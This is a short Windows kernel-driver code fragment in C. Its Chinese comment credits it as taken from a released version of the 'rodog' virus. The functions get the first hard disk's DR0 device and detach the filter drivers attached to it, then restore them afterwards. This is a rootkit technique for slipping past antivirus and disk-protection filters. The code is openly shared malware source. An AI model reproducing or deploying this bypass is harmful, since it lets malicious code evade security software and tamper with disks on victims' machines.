//感谢QQ上某某兄弟的放出来的rodog病毒无壳无下载者版本~
#define PCIHDD_DR0DEVICE_NAME L"//Device//Harddisk0//DR0"
PDEVICE_OBJECT HddDr0Device = NULL;
PDEVICE_OBJECT HddAttDevice = NULL;
void BypassDisk()
{
UNICODE_STRING objectName;
PDEVICE_OBJECT hardObject = NULL;
PFILE_OBJECT fileObject = NULL;
NTSTATUS status;
RtlInitUnicodeString(&objectName, PCIHDD_DR0DEVICE_NAME);
status = IoGetDeviceObjectPointer(&objectName, FILE_READ_ATTRIBUTES, &fileObject, &hardObject);
ASSERT(NT_SUCCESS(status));
HddDr0Device = fileObject->DeviceObject; // 说明 : HddDr0Device->AttachedDevice 就是 hardObject
if(HddDr0Device->AttachedDevice)
{ // 保存DR0上的附加设备, 然后断开附加, 等EndBypass时恢复附加
HddAttDevice = InterlockedExchangePointer((PVOID*)&HddDr0Device->AttachedDevice, NULL);
}
ObDereferenceObject(fileObject);
}
void EndBypass()
{
if(HddDr0Device && HddAttDevice)
{ // 恢复DR0上的附加设备
HddDr0Device->AttachedDevice = HddAttDevice;
}
}